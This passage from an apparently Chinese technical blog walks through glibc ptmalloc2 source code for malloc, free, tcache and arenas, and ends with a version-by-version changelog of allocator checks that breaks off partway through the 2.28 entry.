The particular case of skipping all bins during warm-up phases when no chunks have been returned yet is faster than it might look.
*/

++idx;
bin = bin_at(av, idx);
block = idx2block(idx);
map = av->binmap[block];
bit = idx2bit(idx);

看到这里,使笔者困惑的是 idx 的值是什么?回顾一下之前的代码.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
 if (in_smallbin_range(nb)) {// 准确的表述为:不满足 LargeBin 分配的最小值

//在fastbin 环节分配失败会进入此处.
idx = smallbin_index(nb);
bin = bin_at(av, idx);// bin 是头节点的指针

/* 有删节 */
}

/*
If this is a large request, consolidate fastbins before continuing.
While it might look excessive to kill all fastbins before
even seeing if there is space available, this avoids
fragmentation problems normally associated with fastbins.
Also, in practice, programs tend to have runs of either small or
large requests, but less often mixtures, so consolidation is not
invoked all that often in most programs. And the programs that
it is called frequently in otherwise tend to fragment.
*/

else {
//FastBin SmallBin 中分配失败不会进入此处
idx = largebin_index(nb);
if (atomic_load_relaxed(&av->have_fastchunks))
malloc_consolidate(av);
}

可以看到:

  • nbSmallBin 范围内,则 idxnbSmallBin 中对应的下标.
  • nbLargeBin 范围内,则 idxnbLargeBin 中对应的下标.

因为当前 idx 中无法完成内存分配,那么去下一个 idx 中查找.

1
2
++idx;
bin = bin_at(av, idx);

那么 idx2block(idx) 有什么含义呢?

1
2
3
4
5
6
7
8
9
10
11
/* Conservatively use 32 bits per map word, even if on 64bit system */
#define BINMAPSHIFT 5
#define BITSPERMAP (1U << BINMAPSHIFT)
#define BINMAPSIZE (NBINS / BITSPERMAP)

#define idx2block(i) ((i) >> BINMAPSHIFT)
#define idx2bit(i) ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))

#define mark_bin(m, i) ((m)->binmap[idx2block(i)] |= idx2bit(i))
#define unmark_bin(m, i) ((m)->binmap[idx2block(i)] &= ~(idx2bit(i)))
#define get_binmap(m, i) ((m)->binmap[idx2block(i)] & idx2bit(i))

idx2block() 是为了将 idx 转换成对应的 bitmap 下标.
为什么 idx2block(i)i 右移 5 位呢?注意看这段代码的英文注释,在看看 bitmap 的定义:

1
2
/* Bitmap of bins */
unsigned int binmap[BINMAPSIZE];

看到这里,笔者恍然大悟:

  • bitmapunsigned int 类型的变量的数组.
  • unsigned int 大小为 32 bits.
  • 32 是 $2^5$
  • i 是无符号数,那么 i >> 5 等于 $\frac{i}{2^5}$ (向下取整)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
for (;;) {
/* Skip rest of block if there are no more set bits in this block. */
if (bit > map || bit == 0) {//???
do {
if (++block >= BINMAPSIZE) /* out of bins */
goto use_top;
} while ((map = av->binmap[block]) == 0);

bin = bin_at(av, (block << BINMAPSHIFT));
bit = 1;
}

/* Advance to bin with set bit. There must be one. */
while ((bit & map) == 0) {
bin = next_bin(bin);
bit <<= 1;
assert(bit != 0);
}

/* Inspect the bin. It is likely to be non-empty */
victim = last(bin);

/* If a false alarm (empty bin), clear the bit. */
if (victim == bin) {
av->binmap[block] = map &= ~bit; /* Write through */
bin = next_bin(bin);
bit <<= 1;
}

else {
size = chunksize(victim);

/* We know the first chunk in this bin is big enough to use. */
assert((unsigned long) (size) >= (unsigned long) (nb));

remainder_size = size - nb;

/* unlink */
unlink_chunk(av, victim);

/* Exhaust */
if (remainder_size < MINSIZE) {
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
set_non_main_arena(victim);
}

/* Split */
else {
remainder = chunk_at_offset(victim, nb);

/* We cannot assume the unsorted list is empty and therefore have to perform a complete insert here. */
bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
malloc_printerr("malloc(): corrupted unsorted chunks 2");
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;

/* advertise as last remainder */
if (in_smallbin_range(nb))
av->last_remainder = remainder;
if (!in_smallbin_range(remainder_size)) {
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);
}
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

还是相同的套路:
选定 chunk 后,检测 chunk 大小

  • chunk 大于等于 nb + MINSIZE 则分割,剩余部分形成新的块,放入 UnsortBin.返回分割的 chunk 对应的指针,结束分配流程.
  • chunk 小于 nb + MINSIZE 则全部作为分配的 chunk,返回对应的指针结束分配流程.

使用 Top chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
use_top:
/*
If large enough, split off the chunk bordering the end of memory (held in av->top). Note that this is in accord with the best-fit search rule.
In effect, av->top is treated as larger (and thus less well fitting) than any other available chunk since it can be extended to be as large as necessary (up to system limitations).
We require that av->top always exists (i.e., has size >= MINSIZE) after initialization, so if it would otherwise beexhausted by current request, it is replenished.
(The mainreason for ensuring it exists is that we may need MINSIZE spaceto put in fenceposts in sysmalloc.)
*/

victim = av->top;
size = chunksize(victim);

if (__glibc_unlikely(size > av->system_mem))
malloc_printerr("malloc(): corrupted top size");

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) {
remainder_size = size - nb;
remainder = chunk_at_offset(victim, nb);
av->top = remainder;
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);

check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}

/* When we are using atomic ops to free fast chunks we can get here for all block sizes. */
else if (atomic_load_relaxed(&av->have_fastchunks)) {
malloc_consolidate(av);
/* restore original bin index */
if (in_smallbin_range(nb))
idx = smallbin_index(nb);
else
idx = largebin_index(nb);
}

/* Otherwise, relay to handle system-dependent cases */
else {
void *p = sysmalloc(nb, av);
if (p != NULL)
alloc_perturb(p, bytes);
return p;
}

free

终于来到了 free() 的部分.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
void __libc_free(void *mem) {
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */

void (*hook)(void *, const void *) = atomic_forced_read(__free_hook);
if (__builtin_expect(hook != NULL, 0)) {
(*hook)(mem, RETURN_ADDRESS(0));
return;
}

if (mem == 0) /* free(0) has no effect */
return;

#ifdef USE_MTAG
/* Quickly check that the freed pointer matches the tag for the memory. This gives a useful double-free detection. */
*(volatile char *) mem;
#endif

int err = errno;

p = mem2chunk(mem);

/* Mark the chunk as belonging to the library again. */
(void) TAG_REGION(chunk2rawmem(p), CHUNK_AVAILABLE_SIZE(p) - CHUNK_HDR_SZ);

if (chunk_is_mmapped(p)) /* release mmapped memory. */
{
/* See if the dynamic brk/mmap threshold needs adjusting. Dumped fake mmapped chunks do not affect the threshold. */
if (!mp_.no_dyn_threshold && chunksize_nomask(p) > mp_.mmap_threshold && chunksize_nomask(p) <= DEFAULT_MMAP_THRESHOLD_MAX && !DUMPED_MAIN_ARENA_CHUNK(p)) {
mp_.mmap_threshold = chunksize(p);
mp_.trim_threshold = 2 * mp_.mmap_threshold;
LIBC_PROBE(memory_mallopt_free_dyn_thresholds, 2, mp_.mmap_threshold, mp_.trim_threshold);
}
munmap_chunk(p);
} else {
MAYBE_INIT_TCACHE();

ar_ptr = arena_for_chunk(p);
_int_free(ar_ptr, p, 0);
}

__set_errno(err);
}

看到这段代码:

1
2
3
4
5
void (*hook)(void *, const void *) = atomic_forced_read(__free_hook);
if (__builtin_expect(hook != NULL, 0)) {
(*hook)(mem, RETURN_ADDRESS(0));
return;
}

看到这段代码,真是熟悉的流程.在 __libc_malloc() 源码中:

1
2
3
void *(*hook)(size_t, const void *) = atomic_forced_read(__malloc_hook);//使用原子操作读取 __malloc_hook 将其赋值给 hook
if (__builtin_expect(hook != NULL, 0))
return (*hook)(bytes, RETURN_ADDRESS(0));

是不是非常的相似啊?笔者也这样想.看看 __free_hook 的定义:

1
void weak_variable (*__free_hook)(void *__ptr, const void *) = NULL;

不太一样的地方出现了:

1
void *weak_variable (*__malloc_hook)(size_t __size, const void *) = malloc_hook_ini;

__malloc_hook 被初始化为 malloc_hook_ini,而 __free_hook 被初始化为 NULL

1
2
if (mem == 0) /* free(0) has no effect */
return;

NULL == 0 在大部分环境中都是为真的.也就是说 free(NULL) 是被允许的,并且不会报错.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int err = errno;

p = mem2chunk(mem);

/* Mark the chunk as belonging to the library again. */
(void) TAG_REGION(chunk2rawmem(p), CHUNK_AVAILABLE_SIZE(p) - CHUNK_HDR_SZ);

if (chunk_is_mmapped(p)) /* release mmapped memory. */
{
/* See if the dynamic brk/mmap threshold needs adjusting. Dumped fake mmapped chunks do not affect the threshold. */
if (!mp_.no_dyn_threshold && chunksize_nomask(p) > mp_.mmap_threshold && chunksize_nomask(p) <= DEFAULT_MMAP_THRESHOLD_MAX && !DUMPED_MAIN_ARENA_CHUNK(p)) {
mp_.mmap_threshold = chunksize(p);
mp_.trim_threshold = 2 * mp_.mmap_threshold;
LIBC_PROBE(memory_mallopt_free_dyn_thresholds, 2, mp_.mmap_threshold, mp_.trim_threshold);
}
munmap_chunk(p);
} else {
MAYBE_INIT_TCACHE();

ar_ptr = arena_for_chunk(p);
_int_free(ar_ptr, p, 0);
}

__set_errno(err);

这段代码首先判断内存的来源.

  • 若内存通过 mmap 分配,则在一些检查后执行 munmap
  • 若内存通过 brk 分配,则执行 _int_free()
1
2
3
4
5
6
7
8
9
10
11
size = chunksize(p);

/* Little security check which won't hurt performance: the allocator never wrapps around at the end of the address space.
Therefore we can exclude some size values which might appear here by accident or by "design" from some intruder. */
if (__builtin_expect((uintptr_t) p > (uintptr_t) -size, 0) || __builtin_expect(misaligned_chunk(p), 0))
malloc_printerr("free(): invalid pointer");
/* We know that each chunk is at least MINSIZE bytes in size or a multiple of MALLOC_ALIGNMENT. */
if (__glibc_unlikely(size < MINSIZE || !aligned_OK(size)))
malloc_printerr("free(): invalid size");

check_inuse_chunk(av, p);

常规的安全检查.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
    if ((unsigned long) (size) <= (unsigned long) (get_max_fast())

#if TRIM_FASTBINS
/*
If TRIM_FASTBINS set, don't place chunks bordering top into fastbins
*/
&& (chunk_at_offset(p, size) != av->top)
#endif
) {

if (__builtin_expect(chunksize_nomask(chunk_at_offset(p, size)) <= CHUNK_HDR_SZ, 0) || __builtin_expect(chunksize(chunk_at_offset(p, size)) >= av->system_mem, 0)) {
bool fail = true;
/* We might not have a lock at this point and concurrent modifications of system_mem might result in a false positive.
Redo the test after getting the lock.
*/
if (!have_lock) {
__libc_lock_lock(av->mutex);
fail = (chunksize_nomask(chunk_at_offset(p, size)) <= CHUNK_HDR_SZ || chunksize(chunk_at_offset(p, size)) >= av->system_mem);
__libc_lock_unlock(av->mutex);
}

if (fail)
malloc_printerr("free(): invalid next size (fast)");
}

free_perturb(chunk2mem(p), size - CHUNK_HDR_SZ);

atomic_store_relaxed(&av->have_fastchunks, true);
unsigned int idx = fastbin_index(size);//size 在 FastBin 对应的 idx
fb = &fastbin(av, idx); //fb 是指向头指针的指针

/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
mchunkptr old = *fb, old2;

if (SINGLE_THREAD_P) {//单线程
/* Check that the top of the bin is not the record we are going to add (i.e., double free). */
if (__builtin_expect(old == p, 0))//安全检查
malloc_printerr("double free or corruption (fasttop)");
/* 在 FastBin 链表的头指针处 */
p->fd = PROTECT_PTR(&p->fd, old);//为阻碍恶意攻击,把 &p->fd 处理后存到 old
*fb = p;
} else//多线程
do {
/* Check that the top of the bin is not the record we are going to add (i.e., double free). */
if (__builtin_expect(old == p, 0))
malloc_printerr("double free or corruption (fasttop)");
old2 = old;
p->fd = PROTECT_PTR(&p->fd, old);
} while ((old = catomic_compare_and_exchange_val_rel(fb, p, old2)) != old2);

/* Check that size of fastbin chunk at the top is the same as size of the chunk that we are adding.
We can dereference OLD only if we have the lock, otherwise it might have already been allocated again.
*/
if (have_lock && old != NULL && __builtin_expect(fastbin_index(chunksize(old)) != idx, 0))
malloc_printerr("invalid fastbin entry (free)");
}

chunk 在 FastBin 范围内,则在检查后将其插入对应的 FastBin 链表的头指针处.

TCACHE 与多线程环境

__libc_malloc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
if (!checked_request2size(bytes, &tbytes)) {
__set_errno(ENOMEM);
return NULL;
}
size_t tc_idx = csize2tidx(tbytes);//把 size 转换成 tcache 的 idx

MAYBE_INIT_TCACHE();

DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins && tcache && tcache->counts[tc_idx] > 0) {
victim = tcache_get(tc_idx);
return TAG_NEW_USABLE(victim);
}
DIAG_POP_NEEDS_COMMENT;
#endif
  • 根据 bytes 计算添加元数据后符合对齐要求的 chunk 大小 tbytes
  • 根据 tbytes 计算相应的 tcache 下标 tc_idx
1
2
3
4
5
6
7
8
9
10
/* Caller must ensure that we know tc_idx is valid and there's available chunks to remove.  */
static __always_inline void *tcache_get(size_t tc_idx) {
tcache_entry *e = tcache->entries[tc_idx];
if (__glibc_unlikely(!aligned_OK(e)))
malloc_printerr("malloc(): unaligned tcache chunk detected");
tcache->entries[tc_idx] = REVEAL_PTR(e->next);
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;
}

根据 tc_idx 定位链表头指针 tcache->entries[tc_idx],从链表中删除第一个节点,并将其返回.

看完 tcache 相关的内容,再看看多线程相关的内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// 是多线程
arena_get(ar_ptr, bytes);// 获得线程的 arena

victim = _int_malloc(ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena before. */
if (!victim && ar_ptr != NULL) {
LIBC_PROBE(memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry(ar_ptr, bytes);
victim = _int_malloc(ar_ptr, bytes);
}

if (ar_ptr != NULL)
__libc_lock_unlock(ar_ptr->mutex);

victim = TAG_NEW_USABLE(victim);

assert(!victim || chunk_is_mmapped(mem2chunk(victim)) || ar_ptr == arena_for_chunk(mem2chunk(victim)));
return victim;

多线程部分的主要逻辑是:

获取线程的一个 arena 后,并尝试在其中完成内存分配.若失败,换一块 arean 尝试进行内存分配.


进入 _int_malloc()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size, stash them in the tcache. */
size_t tc_idx = csize2tidx(nb);
if (tcache && tc_idx < mp_.tcache_bins) {
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = *fb) != NULL) {
if (__glibc_unlikely(misaligned_chunk(tc_victim)))
malloc_printerr("malloc(): unaligned fastbin chunk detected 3");
if (SINGLE_THREAD_P)
*fb = REVEAL_PTR(tc_victim->fd);
else {
REMOVE_FB(fb, pp, tc_victim);
if (__glibc_unlikely(tc_victim == NULL))
break;
}
tcache_put(tc_victim, tc_idx);
}
}
#endif

注意本段代码的英文注释:这里给出了一个将 nb 对应的 FastBin 链表中剩余的 chunk 移动到 tcache 的途径.当然, tcache 同样需要受到 tcache_count 的限制,默认情况下 tcache_count 的值为 7.

1
2
3
4
5
6
7
8
9
10
11
/* Caller must ensure that we know tc_idx is valid and there's room for more chunks.  */
static __always_inline void tcache_put(mchunkptr chunk, size_t tc_idx) {
tcache_entry *e = (tcache_entry *) chunk2mem(chunk);

/* Mark this chunk as "in the tcache" so the test in _int_free will detect a double free. */
e->key = tcache;

e->next = PROTECT_PTR(&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

可以看到 tcache_put() 就是简单的链表头插入.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size, stash them in the tcache. */
size_t tc_idx = csize2tidx(nb);
if (tcache && tc_idx < mp_.tcache_bins) {
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last(bin)) != bin) {
if (tc_victim != 0) {
bck = tc_victim->bk;
set_inuse_bit_at_offset(tc_victim, nb);
if (av != &main_arena)
set_non_main_arena(tc_victim);
bin->bk = bck;
bck->fd = bin;

tcache_put(tc_victim, tc_idx);
}
}
}
#endif

FastBin 中将 chunk 移动至 tcache 的路径相似,SmallBin 也存在类似的路径.
这段代码与前段代码极其相似,产生差异的原因主要在于 FastBin 使用单向链表管理 chunk,而 SmallBin 使用双向循环链表管理 chunk

1
2
3
4
5
6
7
8
9
#if USE_TCACHE
INTERNAL_SIZE_T tcache_nb = 0;
size_t tc_idx = csize2tidx(nb);
if (tcache && tc_idx < mp_.tcache_bins)
tcache_nb = nb;
int return_cached = 0;

tcache_unsorted_count = 0;
#endif

在简单的检查后,对变量进行了赋值.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
            /* Take now instead of binning if exact fit */

if (size == nb) {
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
set_non_main_arena(victim);
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills. We may return one of these chunks later. */
if (tcache_nb && tcache->counts[tc_idx] < mp_.tcache_count) {
tcache_put(victim, tc_idx);
return_cached = 1;
continue;
} else {
#endif
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
#if USE_TCACHE
}
#endif
}

请注意代码中的两处英文注释,在对 UnsortBin 的检测中,若遇到合适的 chunk 将优先填充 tcache,而不是立即返回给用户.
这里存在一个将 UnsortBin 转移至 tcache 的路径.

1
2
3
4
5
6
7
#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while filling the cache, return one of the cached ones. */
++tcache_unsorted_count;
if (return_cached && mp_.tcache_unsorted_limit > 0 && tcache_unsorted_count > mp_.tcache_unsorted_limit) {
return tcache_get(tc_idx);
}
#endif
1
2
3
4
5
6
#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
if (return_cached) {
return tcache_get(tc_idx);
}
#endif

这两段代码是如此的相似,都先检查了 return_cached (第一段还检查了其他的条件),满足则从 tcache 中取出 nb 对应的 chunk,并将其返回.

free


_int_free() 部分:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#if USE_TCACHE
{
size_t tc_idx = csize2tidx(size);
if (tcache != NULL && tc_idx < mp_.tcache_bins) {
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem(p);

/* This test succeeds on double free.
However, we don't 100% trust it (it also matches random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely coincidence before aborting.
*/
if (__glibc_unlikely(e->key == tcache)) {
tcache_entry *tmp;
size_t cnt = 0;
LIBC_PROBE(memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = REVEAL_PTR(tmp->next), ++cnt) {
if (cnt >= mp_.tcache_count)
malloc_printerr("free(): too many chunks detected in tcache");
if (__glibc_unlikely(!aligned_OK(tmp)))
malloc_printerr("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a few cycles, but don't abort. */
}
}

if (tcache->counts[tc_idx] < mp_.tcache_count) {
tcache_put(p, tc_idx);
return;
}
}
}
#endif

再看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
graph TD
BEGIN-->__libc_malloc[\__libc_mallloc\]
__libc_malloc-->A
A[分配 x bytes 内存] --> B[计算所需 chunk 大小 tbytes];
B --> C[计算 tcache 下标 tc_idx];
C --> D[tcache 对应链表非空];
D -- True --> tcache_get[\tcache_get\]
tcache_get --> E[返回指针];
E --> END;
D -- False --> F{单线程?};
F -- True --> G1[\_int_malloc\]
F -- False --> H[arena_get 为 arena 加锁]
H --> G2[\_int_malloc\]
G2 --> L{分配成功?}
L -- True -->I[解锁 arena]
L -- False -->M[更换 arean]
M --> G3[\_int_malloc\]
G3 -->I
I --> E
G1 -->E;

整体流程

-->

_int_malloc

  • Init 计算需要分配的 chunk 大小
  • sysmalloc:若无合适的 arena 则调用 sysmalloc 通过 mmap 分配
  • Fast Bin:相同 chunk 大小、LIFO 顺序,取出头节点
    • tcache:若在 FastBin 中分配成功,将同 Fast Bin 中的 chunk 头插入 tcache
  • Small Bin:取出尾节点
    • tcache:若在 SmallBin 中分配成功,将同 Small Bin 中的 chunk 头插入 tcache
  • Unsorted Bin:
    • 特殊规则:对于 Small Bin 范围内的请求,当 Unsorted Bin 仅剩唯一 chunk 且该 chunk 来源于 last remainder,进行分配(能切则切)
    • 查找大小相同的 chunk,头插入 tcache,直到 tcache 满
    • 大小不同的 chunk 按照大小插入 Large Bin(按照大小,相同大小则将当前 chunk 插入在第 2 个) 或者 Small Bin(头插)
    • tcache 满了后则从 Unsorted Bin 中拿出相同大小 chunk 返回
  • 在 Unsorted Bin 中若缓存过 chunk 则返回
  • Large Bin:选择满足大小的 chunk 中最小的,由链表头开始遍历,若有相同大小的 chunk 则用第 2 个,能拆则拆
  • 根据 bitmap 在更大的 Bin 中搜索,
  • 从 Top chunk 分割

_int_free

  • tcache:未满则放入 tcache
  • Fast Bin 头插
  • 不是 mmap 分配则尝试合并
  • mmap 分配则 ummap
    -

ptmalloc2 changelog

2.23

2.24

2.25

New

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* Same, except also perform an argument and result check.  First, we check
that the padding done by request2size didn't result in an integer
overflow. Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
size isn't so large that a later alignment would lead to another integer
overflow. */
#define checked_request2size(req, sz) \
({ \
(sz) = request2size (req); \
if (((sz) < (req)) \
|| REQUEST_OUT_OF_RANGE (sz)) \
{ \
__set_errno (ENOMEM); \
return 0; \
} \
})

Old

1
2
3
4
5
6
7
8
/*  Same, except also perform argument check */

#define checked_request2size(req, sz) \
if (REQUEST_OUT_OF_RANGE (req)) { \
__set_errno (ENOMEM); \
return 0; \
} \
(sz) = request2size (req);

2.26

  • 加入 tcache

2.27

  • tcache Double Free 检测
    New
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    /* We overlay this structure on the user-data portion of a chunk when
    the chunk is stored in the per-thread cache. */
    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    /* This field exists to detect double frees. */
    struct tcache_perthread_struct *key;
    } tcache_entry;
    /* 有删节 */
    /* Caller must ensure that we know tc_idx is valid and there's room
    for more chunks. */
    static __always_inline void
    tcache_put (mchunkptr chunk, size_t tc_idx)
    {
    tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
    assert (tc_idx < TCACHE_MAX_BINS);

    /* Mark this chunk as "in the tcache" so the test in _int_free will
    detect a double free. */
    e->key = tcache;

    e->next = tcache->entries[tc_idx];
    tcache->entries[tc_idx] = e;
    ++(tcache->counts[tc_idx]);
    }
    /* 有删节 */
    static void
    _int_free (mstate av, mchunkptr p, int have_lock)
    {
    /* 有删节 */
    size = chunksize (p);

    /* Little security check which won't hurt performance: the
    allocator never wrapps around at the end of the address space.
    Therefore we can exclude some size values which might appear
    here by accident or by "design" from some intruder. */
    if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
    || __builtin_expect (misaligned_chunk (p), 0))
    malloc_printerr ("free(): invalid pointer");
    /* We know that each chunk is at least MINSIZE bytes in size or a
    multiple of MALLOC_ALIGNMENT. */
    if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    malloc_printerr ("free(): invalid size");

    check_inuse_chunk(av, p);

    #if USE_TCACHE
    {
    size_t tc_idx = csize2tidx (size);
    if (tcache != NULL && tc_idx < mp_.tcache_bins)
    {
    /* Check to see if it's already in the tcache. */
    tcache_entry *e = (tcache_entry *) chunk2mem (p);

    /* This test succeeds on double free. However, we don't 100%
    trust it (it also matches random payload data at a 1 in
    2^<size_t> chance), so verify it's not an unlikely
    coincidence before aborting. */
    if (__glibc_unlikely (e->key == tcache))
    {
    tcache_entry *tmp;
    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
    for (tmp = tcache->entries[tc_idx];
    tmp;
    tmp = tmp->next)
    if (tmp == e)
    malloc_printerr ("free(): double free detected in tcache 2");
    /* If we get here, it was a coincidence. We've wasted a
    few cycles, but don't abort. */
    }

    if (tcache->counts[tc_idx] < mp_.tcache_count)
    {
    tcache_put (p, tc_idx);
    return;
    }
    }
    }
    #endif
    /* 有删节 */
    }

Old

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next;
} tcache_entry;
/* 有删节 */
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
/* 有删节 */
static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
/* 有删节 */
size = chunksize (p);

/* Little security check which won't hurt performance: the
allocator never wrapps around at the end of the address space.
Therefore we can exclude some size values which might appear
here by accident or by "design" from some intruder. */
if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
|| __builtin_expect (misaligned_chunk (p), 0))
malloc_printerr ("free(): invalid pointer");
/* We know that each chunk is at least MINSIZE bytes in size or a
multiple of MALLOC_ALIGNMENT. */
if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
malloc_printerr ("free(): invalid size");

check_inuse_chunk(av, p);

#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);

if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
#endif
/* 有删节 */
}

  • malloc_consolidate() 新增 FastBin 相关 check

New

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static void malloc_consolidate(mstate av)
{
/* 有删节 */
maxfb = &fastbin (av, NFASTBINS - 1);
fb = &fastbin (av, 0);
do {
p = atomic_exchange_acq (fb, NULL);
if (p != 0) {
do {
{
unsigned int idx = fastbin_index (chunksize (p));
if ((&fastbin (av, idx)) != fb)
malloc_printerr ("malloc_consolidate(): invalid chunk size");
}

check_inuse_chunk(av, p);
nextp = p->fd;

/* 有删节 */
} while ( (p = nextp) != 0);

}
} while (fb++ != maxfb);
}

Old

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static void malloc_consolidate(mstate av)
{
/* 有删节 */
maxfb = &fastbin (av, NFASTBINS - 1);
fb = &fastbin (av, 0);
do {
p = atomic_exchange_acq (fb, NULL);
if (p != 0) {
do {
check_inuse_chunk(av, p);
nextp = p->fd;

/* 有删节 */

} while ( (p = nextp) != 0);

}
} while (fb++ != maxfb);
/* 有删节 */
}

2.28

  • 修复 __libc_malloctcache 错误
    New

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    void *
    __libc_malloc (size_t bytes)
    {
    mstate ar_ptr;
    void *victim;

    void *(*hook) (size_t, const void *)
    = atomic_forced_read (__malloc_hook);
    if (__builtin_expect (hook != NULL, 0))
    return (*hook)(bytes, RETURN_ADDRESS (0));
    #if USE_TCACHE
    /* int_free also calls request2size, be careful to not pad twice. */
    size_t tbytes;
    checked_request2size (bytes, tbytes);
    size_t tc_idx = csize2tidx (tbytes);

    MAYBE_INIT_TCACHE ();

    DIAG_PUSH_NEEDS_COMMENT;
    if (tc_idx < mp_.tcache_bins
    && tcache
    && tcache->counts[tc_idx] > 0) //改动在此处
    {
    return tcache_get (tc_idx);
    }
    DIAG_POP_NEEDS_COMMENT;
    #endif
    /* 有删节 */
    }

    Old

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
